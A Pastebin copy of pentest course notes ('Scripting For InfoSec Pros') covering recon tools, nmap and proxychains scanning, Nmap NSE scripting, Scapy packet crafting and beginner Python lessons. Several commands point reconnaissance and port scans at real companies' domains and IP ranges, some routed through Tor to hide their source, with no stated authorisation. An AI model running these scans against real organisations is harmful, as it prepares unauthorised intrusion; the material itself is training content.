SHARE
TWEET

Untitled

djtroby May 31st, 2017 100 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##################################
  2. # Scripting For InfoSec Pros     #
  3. # By Joe McCray                  #
  4. ##################################
  5.  
  6.  
  7.  
  8. ##########
  9. # VMWare #
  10. ##########
  11. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  12.  
  13.  
  14. ##########################
  15. # Download the attack VM #
  16. ##########################
  17. https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
  18. user:      infosecaddicts
  19. pass:      infosecaddicts
  20.  
  21.  
  22. Here is a good set of slides for getting started with Linux:
  23. http://www.slideshare.net/olafusimichael/linux-training-24086319
  24.  
  25.  
  26.  
  27. ########################################
  28. # Boot up the StrategicSec Ubuntu host #
  29. # You can also boot up the Win7 as well#
  30. ########################################
  31.  
  32. - Log in to your Ubuntu host with the following credentials:
  33.     user: strategicsec
  34.     pass: strategicsec
  35.  
  36.  
  37.  
  38. - I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.
  39. - You can download Putty from here:
  40. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  41.  
  42.  
  43. - For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host
  44.  
  45.  
  46. Email Harvesting
  47. ----------------
  48.  
  49. cd ~/toolz/
  50.  
  51. rm -rf theharvester-read-only/
  52.  
  53. sudo apt install -y python-pyasn1 python-pyasn1-modules git vim nmap openssh-server proxychains git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev
  54.      strategicsec
  55.  
  56. pip install requests
  57.  
  58. git clone https://github.com/laramies/theHarvester.git
  59.  
  60. cd theHarvester/
  61.  
  62. python theHarvester.py
  63.  
  64. python theHarvester.py -d motorola.com -l 50 -b google
  65.  
  66. python theHarvester.py -d motorola.com -l 50 -b bing
  67.  
  68. python theHarvester.py -d motorola.com -l 50 -b linkedin
  69.  
  70. python theHarvester.py -d motorola.com -l 50 -b pgp
  71.  
  72.  
  73.  
  74.  
  75.  
  76. File Meta-Data Harvesting
  77. -------------------------
  78. cd ~/toolz/
  79.  
  80. sudo apt-get install -y python-pip
  81.      strategicsec
  82.  
  83. pip install --upgrade pip
  84.  
  85. pip install google
  86.  
  87.  
  88. git clone https://github.com/opsdisk/metagoofil.git
  89.  
  90. cd metagoofil/
  91.  
  92.  
  93. python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles
  94.  
  95. sudo apt install libimage-exiftool-perl
  96.      strategicsec
  97.  
  98. cd motorolafiles
  99.  
  100. exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u
  101.  
  102.  
  103.  
  104. python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
  105. Whereas:
  106.  
  107. -d : I used another domain name aside from Google.com to make it work
  108. -t : I asked for the program to search two types of public documents whuch are doc and pdf files
  109. -l : I limited the search result to 100 to make the process faster
  110. -n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
  111. -o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
  112. -f : Save the html links to html_links_<TIMESTAMP>.txt file
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119. Github Info Harvesting
  120. ----------------------
  121. cd ~/toolz/
  122.  
  123. sudo pip install gitem
  124.      strategicsec
  125.  
  126.  
  127. gitem organization facebook
  128.  
  129.  
  130. gitem repository facebook react
  131.  
  132.  
  133. gitem --processes 4 user zpao
  134.  
  135. You'll probably get a message that says "Your API requests are being rate-limited"
  136.  
  137.  
  138. You can create an Oauth token using the link below:
  139. Reference:
  140. https://help.github.com/articles/creating-an-access-token-for-command-line-use/
  141.  
  142.  
  143. gitem -o 123f45672972c18ea0f42fc70bc8c5172b96d890 --processes 4 user zpao
  144. You'll have to use your own Oauth token
  145.  
  146.  
  147.  
  148.  
  149. Network Topology Enumeration
  150. ----------------------------
  151.  
  152. cd ~/toolz/
  153.  
  154. wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py
  155.  
  156. python gxfr.py --bxfr --dns-lookup -o
  157.     motorola.com
  158.     [ press enter ]
  159.     cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=
  160.  
  161.  
  162.  
  163.  
  164. cd ~/toolz/
  165.  
  166. wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
  167.  
  168. chmod +x blindcrawl.pl
  169.  
  170. perl blindcrawl.pl -d motorola.com
  171.  
  172.  
  173.  
  174. rm -rf fierce2/
  175.  
  176. git clone https://github.com/mschwager/fierce.git
  177.  
  178. cd fierce
  179.  
  180. sudo apt-get install -y python3-pip
  181.     strategicsec
  182.  
  183. sudo pip3 install -r requirements.txt
  184.  
  185. python3 fierce.py -h
  186.  
  187. python3 fierce.py --domain motorola.com --subdomains accounts admin ads
  188. Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:
  189.  
  190. python3 fierce.py --domain facebook.com --subdomains admin --traverse 10
  191.  
  192.  
  193. Limit nearby IP traversal to certain domains with the --search flag:
  194.  
  195. python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net
  196.  
  197.  
  198. Attempt an HTTP connection on domains discovered with the --connect flag:
  199.  
  200. python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
  201.  
  202.  
  203.  
  204.  
  205.  
  206. Another good way to find servers
  207. --------------------------------
  208. cd ~/toolz
  209.  
  210. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  211.  
  212. gcc ipcrawl.c -o ipcrawl
  213.  
  214. chmod 777 ipcrawl
  215.  
  216. ./ipcrawl 148.87.1.1 148.87.1.254               (DNS forward lookup against an IP range)
  217.  
  218.  
  219.  
  220.  
  221. Check for Load Balancers
  222. ------------------------
  223. Here are some command-line options to use for identifying load balancers:
  224.  
  225. dig microsoft.com
  226.  
  227. cd ~/toolz
  228. wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh
  229. chmod +x lbd.sh
  230. ./lbd.sh microsoft.com
  231.  
  232.  
  233. git clone https://github.com/jmbr/halberd.git
  234. cd halberd
  235. sudo python setup.py install
  236.      strategicsec
  237. halberd microsoft.com
  238. halberd motorola.com
  239. halberd oracle.com
  240.  
  241.  
  242.  
  243. Test for Web Application Firewalls (WAFs)
  244. -----------------------------------------
  245. pip install wafw00f
  246.  
  247. wafw00f http://strategicsec.com
  248.  
  249. wafw00f http://oracle.com
  250.  
  251.  
  252. sudo nmap -p 80 --script http-waf-detect.nse strategicsec.com
  253.      strategicsec
  254.  
  255.  
  256. sudo nmap -p 80 --script http-waf-detect.nse oracle.com
  257.      strategicsec
  258.  
  259.  
  260.  
  261.  
  262.  
  263.  
  264. Recon-NG (Metasploit for Recon):
  265. --------------------------------
  266. cd ~/toolz/
  267.  
  268. sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
  269.     strategicsec
  270.  
  271. sudo pip install dicttoxml
  272.     strategicsec
  273.  
  274.  
  275.  
  276. git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
  277. cd recon-ng
  278. pip install PyPDF2
  279. sudo pip install olefile
  280.     strategicsec
  281. ./recon-ng
  282.  
  283.  
  284.  
  285. At the prompt, let's type help in order to look at the commands we can use in Recon-ng.
  286.  
  287. recon-ng > help
  288.  
  289.  
  290. Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset.
  291.  
  292. recon-ng > [ TAB ] [ TAB ]
  293.  
  294.  
  295.  
  296. To see all the modules in Recon-ng, we can type:
  297.  
  298. recon-ng > show [ TAB ] [ TAB ]
  299.  
  300.  
  301.  
  302. Ok, let's drive this thing....
  303.  
  304. recon-ng > show banner
  305.  
  306. recon-ng > show companies
  307.  
  308. recon-ng > show contacts
  309.  
  310. recon-ng > show credentials
  311.  
  312. recon-ng > show dashboard
  313.  
  314. recon-ng > show domains
  315.  
  316. recon-ng > show hosts
  317.  
  318. recon-ng > show keys
  319.  
  320. recon-ng > show leaks
  321.  
  322. recon-ng > show locations
  323.  
  324. recon-ng > show modules
  325.  
  326. recon-ng > show netblocks
  327.  
  328. recon-ng > show options
  329.  
  330. recon-ng > show ports
  331.  
  332. recon-ng > show profiles
  333.  
  334. recon-ng > show pushpins
  335.  
  336. recon-ng > show repositories
  337.  
  338. recon-ng > show schema
  339.  
  340. recon-ng > show vulnerabilities
  341.  
  342. recon-ng > show workspaces
  343.  
  344.  
  345.  
  346.  
  347.  
  348. When you have found a module that you would like to try the process is fairly straight forward.
  349.  
  350. Type, “use [Modulename]” to use the module
  351.  
  352. Type, “show info” to view information about the module
  353.  
  354. And then, “show options” to see what variables can be set
  355.  
  356. Set the option variables with “set [variable]”
  357.  
  358. Finally, type “run” to execute the module
  359.  
  360.  
  361. ********************************** Begin Day 1 Homework Part 1 **********************************
  362. NOTE: Take screenshots of your performing all of the commands we've learned so far
  363.  
  364.  
  365. You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx' (ex: Joseph-McCray-Scripting-For-InfoSec-Day1-Basic-Linux-Pentest-Commands.docx).
  366.  
  367. You must spell you name EXACTLY as you want it spelled on your class certificate.
  368.  
  369. IMPORTANT NOTE:
  370. Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST.
  371.  
  372.  
  373. ********************************** End Day 1 Homework Part 1 **********************************
  374.  
  375.  
  376.  
  377. ********************************** Begin Day 1 Homework Part 2 **********************************
  378. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  379.  
  380.  
  381. You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
  382.  
  383.  
  384. You must create a MS WORD document titled 'FirstName-LastName-Scripting-For-InfoSec-Day1-Recon-NG.docx' (ex: Joseph-McCray--Scripting-For-InfoSec-Day1-Recon-NG.docx).
  385.  
  386. You must spell you name EXACTLY as you want it spelled on your class certificate.
  387.  
  388.  
  389. Reference links:
  390. http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
  391. http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/
  392.  
  393. IMPORTANT NOTE:
  394. Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday January 29th at midnight EST
  395.  
  396. ********************************** End Day 1 Homework Part 2 **********************************
  397.  
  398.  
  399.  
  400.  
  401. ########################
  402. # Scanning Methodology #
  403. ########################
  404.  
  405. - Ping Sweep
  406. What's alive?
  407. ------------
  408. sudo nmap -sP 157.166.226.*
  409.      strategicsec
  410.  
  411.     -if -SP yields no results try:
  412. sudo nmap -sL 157.166.226.*
  413.      strategicsec
  414.  
  415. - Port Scan
  416. What's where?
  417. ------------
  418. sudo nmap -sS 162.243.126.247
  419.      strategicsec
  420.  
  421.  
  422. - Bannergrab/Version Query
  423. What versions of software are running
  424. -------------------------------------
  425. sudo nmap -sV 162.243.126.247
  426.      strategicsec
  427.  
  428.  
  429. - Vulnerability Research
  430. Lookup the banner versions for public exploits
  431. ----------------------------------------------
  432. http://exploit-db.com
  433. http://securityfocus.com/bid
  434. https://packetstormsecurity.com/files/tags/exploit/
  435.  
  436.  
  437.  
  438. #######################################################
  439. # Day 1: 3rd Party Scanning, and scanning via proxies #
  440. #######################################################
  441.  
  442. https://www.shodan.io/
  443.  
  444.     Create a FREE account and login
  445.  
  446.     net:129.188.8.0/24
  447.  
  448.  
  449.  
  450. cd /home/strategicsec/toolz/
  451. perl proxyfinder-0.3.pl multiproxy 3 proxies.txt    <-- This takes a long time to run
  452.  
  453.  
  454.  
  455. sudo vi /etc/proxychains.conf               <--- Make sure that last line of the file is: socks4  127.0.0.1 9050
  456.      strategicsec
  457.  
  458.  
  459.  
  460.  
  461. ----------------------------------------------------------------------
  462. vi ~/toolz/fix-proxychains-dns.sh
  463.  
  464. #!/bin/bash
  465. # This script is called by proxychains to resolve DNS names
  466. # DNS server used to resolve names
  467. # Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
  468. DNS_SERVER=4.2.2.2
  469.  
  470. if [ $# = 0 ] ; then
  471. echo " usage:"
  472. echo " proxyresolv <hostname> "
  473. exit
  474. fi
  475.  
  476. export LD_PRELOAD=libproxychains.so.3
  477. dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
  478. -----------------------------------------------------------------------
  479.  
  480.  
  481. sudo ntpdate pool.ntp.org
  482.      strategicsec
  483.  
  484. tor-resolve strategicsec.com
  485.  
  486. proxychains nmap -sT -p80 162.243.126.247
  487.  
  488. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247
  489.  
  490.  
  491.  
  492.  
  493.  
  494.  
  495.  
  496. #########################
  497. # Playing with Nmap NSE #
  498. #########################
  499.  
  500. nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
  501.  
  502. nmap -p80 --script dns-brute strategicsec.com
  503.  
  504. nmap --script http-robtex-reverse-ip secore.info
  505.  
  506. nmap -Pn -p80 --script=http-headers strategicsec.com
  507.  
  508.  
  509. ls /usr/share/nmap/scripts | grep http
  510. nmap -Pn -p80 --script=http-* strategicsec.com
  511.  
  512.  
  513.  
  514. #########################
  515. # Playing with Nmap NSE #
  516. #########################
  517.  
  518. nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
  519.  
  520. nmap -p80 --script dns-brute strategicsec.com
  521.  
  522. nmap --script http-robtex-reverse-ip secore.info
  523.  
  524. nmap -Pn -p80 --script=http-headers strategicsec.com
  525.  
  526.  
  527. ls /usr/share/nmap/scripts | grep http
  528. nmap -Pn -p80 --script=http-* strategicsec.com
  529.  
  530. ############
  531. # Nmap NSE #
  532. ############
  533.  
  534. - Reference for this tutorial is:
  535. https://thesprawl.org/research/writing-nse-scripts-for-vulnerability-scanning/
  536.  
  537. ----------------------------------------------------------------------
  538. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  539.      strategicsec
  540.  
  541.  
  542.  
  543. -- The Head Section --
  544. -- The Rule Section --
  545. portrule = function(host, port)
  546.     return port.protocol == "tcp"
  547.             and port.number == 80
  548.             and port.state == "open"
  549. end
  550.  
  551. -- The Action Section --
  552. action = function(host, port)
  553.     return "I love Linux!"
  554. end
  555. ----------------------------------------------------------------------
  556.  
  557. - Ok, now that we've made that change let's run the script
  558. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
  559.  
  560.  
  561.  
  562.  
  563.  
  564.  
  565. ----------------------------------------------------------------------
  566. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  567.  
  568. -- The Head Section --
  569. local shortport = require "shortport"
  570.  
  571. -- The Rule Section --
  572. portrule = shortport.http
  573.  
  574.  
  575. -- The Action Section --
  576. action = function(host, port)
  577.     return "I still love Linux!"
  578. end
  579. ----------------------------------------------------------------------
  580.  
  581. - Ok, now that we've made that change let's run the script
  582. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
  583.  
  584.  
  585.  
  586.  
  587.  
  588.  
  589.  
  590. OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working.
  591.  
  592. ----------------------------------------------------------------------
  593. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  594.  
  595. -- The Head Section --
  596. local shortport = require "shortport"
  597. local http = require "http"
  598.  
  599. -- The Rule Section --
  600. portrule = shortport.http
  601.  
  602. -- The Action Section --
  603. action = function(host, port)
  604.  
  605.     local uri = "/installing-metasploit-in-ubunt/"
  606.     local response = http.get(host, port, uri)
  607.     return response.status
  608.  
  609. end
  610. ----------------------------------------------------------------------
  611.  
  612. - Ok, now that we've made that change let's run the script
  613. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  614.  
  615.  
  616.  
  617.  
  618. ----------------------------------------------------------------------
  619. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  620.  
  621. -- The Head Section --
  622. local shortport = require "shortport"
  623. local http = require "http"
  624.  
  625. -- The Rule Section --
  626. portrule = shortport.http
  627.  
  628. -- The Action Section --
  629. action = function(host, port)
  630.  
  631.     local uri = "/installing-metasploit-in-ubunt/"
  632.     local response = http.get(host, port, uri)
  633.  
  634.     if ( response.status == 200 ) then
  635.         return response.body
  636.     end
  637.  
  638. end
  639. ----------------------------------------------------------------------
  640.  
  641. - Ok, now that we've made that change let's run the script
  642. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  643.  
  644.  
  645.  
  646.  
  647.  
  648.  
  649.  
  650.  
  651.  
  652. ----------------------------------------------------------------------
  653. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  654.  
  655. -- The Head Section --
  656. local shortport = require "shortport"
  657. local http = require "http"
  658. local string = require "string"
  659.  
  660. -- The Rule Section --
  661. portrule = shortport.http
  662.  
  663. -- The Action Section --
  664. action = function(host, port)
  665.  
  666.     local uri = "/installing-metasploit-in-ubunt/"
  667.     local response = http.get(host, port, uri)
  668.  
  669.     if ( response.status == 200 ) then
  670.         local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  671.         return title
  672.     end
  673.  
  674. end
  675. ----------------------------------------------------------------------
  676.  
  677. - Ok, now that we've made that change let's run the script
  678. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  679.  
  680.  
  681.  
  682.  
  683.  
  684.  
  685.  
  686. ----------------------------------------------------------------------
  687. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  688.  
  689. -- The Head Section --
  690. local shortport = require "shortport"
  691. local http = require "http"
  692. local string = require "string"
  693.  
  694. -- The Rule Section --
  695. portrule = shortport.http
  696.  
  697. -- The Action Section --
  698. action = function(host, port)
  699.  
  700.     local uri = "/installing-metasploit-in-ubunt/"
  701.     local response = http.get(host, port, uri)
  702.  
  703.     if ( response.status == 200 ) then
  704.         local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  705.  
  706.         if (title) then
  707.             return "Vulnerable"
  708.         else
  709.             return "Not Vulnerable"
  710.         end
  711.     end
  712. end
  713.  
  714. ----------------------------------------------------------------------
  715.  
  716. - Ok, now that we've made that change let's run the script
  717. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  718.  
  719.  
  720.  
  721. ####################
  722. # Installing Scapy #
  723. ####################
  724.  
  725. sudo apt-get update
  726. sudo apt-get install python-scapy python-pyx python-gnuplot python-pycryptopp python-pycryptopp-dbg python-crypto python-crypto-dbg python-cryptography
  727.  
  728.  
  729. - Reference Page For All Of The Commands We Will Be Running:
  730. http://samsclass.info/124/proj11/proj17-scapy.html
  731.  
  732.  
  733.  
  734.  
  735.  
  736. - To run Scapy interactively
  737.  
  738.     sudo scapy
  739.  
  740.  
  741.  
  742. #####################################
  743. # Sending ICMPv4 Packets with scapy #
  744. #####################################
  745.  
  746. - In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
  747.  
  748.     i = IP()
  749.  
  750.  
  751.  
  752.  
  753. - This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
  754.  
  755.     i.display()
  756.  
  757.  
  758.  
  759.  
  760. - Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
  761.  
  762.     i.dst="192.168.54.184"
  763.  
  764.     i.display()
  765.  
  766.  
  767.  
  768.  
  769. - Notice that scapy automatically fills in your machine's source IP address.
  770.  
  771. - Use these commands to create an object named ic of type ICMP and display its properties:
  772.  
  773.  
  774.     ic = ICMP()
  775.  
  776.     ic.display()
  777.  
  778.  
  779.  
  780.  
  781.  
  782. - Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
  783.  
  784.     sr1(i/ic)
  785.  
  786.  
  787.  
  788.  
  789.  
  790. - This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4.
  791.  
  792.  
  793. - The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
  794.  
  795. - Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
  796.  
  797.  
  798.     sr1(i/ic/"YOUR NAME")
  799.  
  800.  
  801. - You should see a reply with a Raw section containing your name.
  802.  
  803.  
  804.  
  805. ###################################
  806. # Sending a UDP Packet with Scapy #
  807. ###################################
  808.  
  809.  
  810. - Preparing the Target
  811. $ ncat -ulvp 4444
  812.  
  813.  
  814.  
  815.  
  816. --open another terminal--
  817. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  818.  
  819.     u = UDP()
  820.  
  821.     u.display()
  822.  
  823.  
  824.  
  825. - This creates an object named u of type UDP, and displays its properties.
  826.  
  827. - Execute these commands to change the destination port to 4444 and display the properties again:
  828.  
  829.     i.dst="192.168.54.184"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  830.  
  831.     u.dport = 4444
  832.  
  833.     u.display()
  834.  
  835.  
  836.  
  837. - Execute this command to send the packet to the Windows machine:
  838.  
  839.     send(i/u/"YOUR NAME SENT VIA UDP\n")
  840.  
  841.  
  842.  
  843. - On the Windows target, you should see the message appear
  844.  
  845.  
  846. p = sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="strategicsec.com")))
  847.  
  848.  
  849. p=sr(IP(dst="192.168.230.2")/TCP(dport=[23,80,53,443]))
  850.  
  851.  
  852. p=sr(IP(dst="192.168.230.2")/TCP(dport=[80]))
  853.  
  854.  
  855. traceroute (["strategicsec.com"], maxttl=20)
  856.     This is actually an ICMP & TCP traceroute, default destination is port 80
  857.  
  858.  
  859. traceroute (["strategicsec.com"], dport=443, maxttl=20)
  860.  
  861.  
  862.  
  863. ############################
  864. # Ping Sweeping with Scapy #
  865. ############################
  866.  
  867. ----------------------------------------------------------------------
  868. vi scapy-pingsweep.py
  869.  
  870.  
  871. #!/usr/bin/python
  872. from scapy.all import *
  873.  
  874. TIMEOUT = 2
  875. conf.verb = 0
  876. for ip in range(0, 256):
  877.     packet = IP(dst="192.168.1." + str(ip), ttl=20)/ICMP()
  878.     reply = sr1(packet, timeout=TIMEOUT)
  879.     if not (reply is None):
  880.          print reply.dst, "is online"
  881.     else:
  882.          print "Timeout waiting for %s" % packet[IP].dst
  883. ----------------------------------------------------------------------
  884.  
  885.  
  886. ###############################################
  887. # Checking out some scapy based port scanners #
  888. ###############################################
  889.  
  890. wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
  891.  
  892. cat rdp_scan.py
  893.  
  894. sudo python rdp_scan.py 192.168.1.250
  895.  
  896.  
  897. #########################################
  898. # Here is the courseware for this month #
  899. #########################################
  900.  
  901. Class powerpoint slides:
  902. https://s3.amazonaws.com/StrategicSec-Files/Python/PythonV3-1.pptx
  903.  
  904.  
  905.  
  906. Courseware Lab Manual
  907. https://s3.amazonaws.com/StrategicSec-Files/Python/Python-For-InfoSec-Pros-2015.pdf
  908.  
  909.  
  910.  
  911. https://s3-us-west-2.amazonaws.com/infosecaddicts/InfoSecAddictsVM.zip
  912. user:      infosecaddicts
  913. pass:      infosecaddicts
  914.  
  915.  
  916. The youtube video playlist that I'd like for you to watch is located here:
  917. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  918.  
  919.  
  920. ####################
  921. # Installing Python#
  922. ####################
  923. Windows
  924. 32-Bit Version
  925. http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
  926.  
  927. 64-Bit Version
  928. http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi
  929.  
  930. After you install Python in Windows the next thing you may want to install is IdleX:
  931. http://idlex.sourceforge.net/features.html
  932.  
  933.  
  934. Linux
  935. Debian/Ubuntu:      sudo apt-get install -y python
  936. RHEL/CentOS/Fedora: sudo yum install -y python
  937.  
  938. After you install Python in Linux the next thing that you will need to do is install idle.
  939.  
  940. sudo apt-get install -y idle
  941.  
  942. Open IDLE, and let's just dive right in.
  943.  
  944.  
  945.  
  946.  
  947. #############################
  948. # Lesson 1: Simple Printing #
  949. #############################
  950.  
  951. >>> print "Today we are learning Python."
  952.  
  953.  
  954.  
  955.  
  956.  
  957.  
  958. #####################################
  959. # Lesson 2: Simple Numbers and Math #
  960. #####################################
  961.  
  962. >>> 2+2
  963.  
  964. >>> 6-3
  965.  
  966. >>> 18/7
  967.  
  968. >>> 18.0/7
  969.  
  970. >>> 18.0/7.0
  971.  
  972. >>> 18/7
  973.  
  974. >>> 9%4
  975.  
  976. >>> 8%4
  977.  
  978. >>> 8.75%.5
  979.  
  980. >>> 6.*7
  981.  
  982. >>> 6*6*6
  983.  
  984. >>> 6**3
  985.  
  986. >>> 5**12
  987.  
  988. >>> -5**4
  989.  
  990.  
  991.  
  992.  
  993.  
  994.  
  995. #######################
  996. # Lesson 3: Variables #
  997. #######################
  998.  
  999. >>> x=18
  1000.  
  1001. >>> x+15
  1002.  
  1003. >>> x**3
  1004.  
  1005. >>> y=54
  1006.  
  1007. >>> x+y
  1008.  
  1009. >>> g=input("Enter number here: ")
  1010.     43
  1011.  
  1012. >>> g+32
  1013.  
  1014. >>> g**3
  1015.  
  1016.  
  1017.  
  1018.  
  1019.  
  1020.  
  1021.  
  1022.  
  1023. ###################################
  1024. # Lesson 4: Modules and Functions #
  1025. ###################################
  1026.  
  1027. >>> 5**4
  1028.  
  1029. >>> pow(5,4)
  1030.  
  1031. >>> abs(-18)
  1032.  
  1033. >>> abs(5)
  1034.  
  1035. >>> floor(18.7)
  1036.  
  1037. >>> import math
  1038.  
  1039. >>> math.floor(18.7)
  1040.  
  1041. >>> math.sqrt(81)
  1042.  
  1043. >>> joe = math.sqrt
  1044.  
  1045. >>> joe(9)
  1046.  
  1047. >>> joe=math.floor
  1048.  
  1049. >>> joe(19.8)
  1050.  
  1051.  
  1052.  
  1053.  
  1054.  
  1055.  
  1056.  
  1057. ##################################
  1058. # Lesson 5: How to Save Programs #
  1059. ##################################
  1060. Run "IDLE (Python GUI)"
  1061.  
  1062. File -> New Window
  1063.  
  1064. print "Python for InfoSec"
  1065.  
  1066. File -> Save as
  1067.     py4InfoSec.py
  1068.  
  1069. Run -> Run Module or Press "F5"
  1070.  
  1071.  
  1072.  
  1073.  
  1074.  
  1075. Create a file name.py
  1076.  
  1077. x = raw_input("Enter name: ")
  1078. print "Hey " + x
  1079. raw_input("Press<enter>")
  1080.  
  1081.  
  1082. Run -> Run Module or Press "F5"
  1083.  
  1084.  
  1085.  
  1086.  
  1087.  
  1088.  
  1089.  
  1090.  
  1091. #####################
  1092. # Lesson 6: Strings #
  1093. #####################
  1094.  
  1095. >>> "XSS"
  1096.  
  1097. >>> 'SQLi'
  1098.  
  1099. >>> "Joe's a python lover"
  1100.  
  1101. >>> 'Joe\'s a python lover'
  1102.  
  1103. >>> "Joe said \"InfoSec is fun\" to me"
  1104.  
  1105. >>> a = "Joe"
  1106.  
  1107. >>> b = "McCray"
  1108.  
  1109. >>> a, b
  1110.  
  1111. >>> a+b
  1112.  
  1113.  
  1114.  
  1115.  
  1116.  
  1117.  
  1118.  
  1119.  
  1120. ##########################
  1121. # Lesson 7: More Strings #
  1122. ##########################
  1123.  
  1124. >>> num = 10
  1125.  
  1126. >>> num + 2
  1127.  
  1128. >>> "The number of open ports found on this system is " + num
  1129.  
  1130. >>> num = str(18)
  1131.  
  1132. >>> "There are " + num + " vulnerabilities found in this environment."
  1133.  
  1134. >>> num2 = 46
  1135.  
  1136. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
  1137.  
  1138.  
  1139.  
  1140.  
  1141.  
  1142.  
  1143.  
  1144.  
  1145. #######################
  1146. # Lesson 8: Raw Input #
  1147. #######################
  1148. Run "IDLE (Python GUI)"
  1149.  
  1150. File -> New Window
  1151.  
  1152. joemccray=input("Enter name: ")
  1153. print joemccray
  1154.  
  1155.  
  1156.  
  1157. Run -> Run Module               # Will throw an error
  1158.     or
  1159. Press "F5"
  1160.  
  1161. File -> New Window
  1162. joemccray=raw_input("Enter name: ")
  1163.  
  1164. Run -> Run Module               # Will throw an error
  1165.  
  1166.     or
  1167.  
  1168. Press "F5"
  1169.  
  1170. NOTE:
  1171. Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
  1172.  
  1173.  
  1174.  
  1175.  
  1176.  
  1177.  
  1178.  
  1179. #################################
  1180. # Lesson 9: Sequences and Lists #
  1181. #################################
  1182.  
  1183. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  1184.  
  1185. >>> attacks
  1186. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  1187.  
  1188. >>> attacks[3]
  1189. 'SQL Injection'
  1190.  
  1191. >>> attacks[-2]
  1192. 'Cross-Site Scripting'
  1193.  
  1194.  
  1195.  
  1196.  
  1197.  
  1198.  
  1199. ##########################
  1200. # Level 10: If Statement #
  1201. ##########################
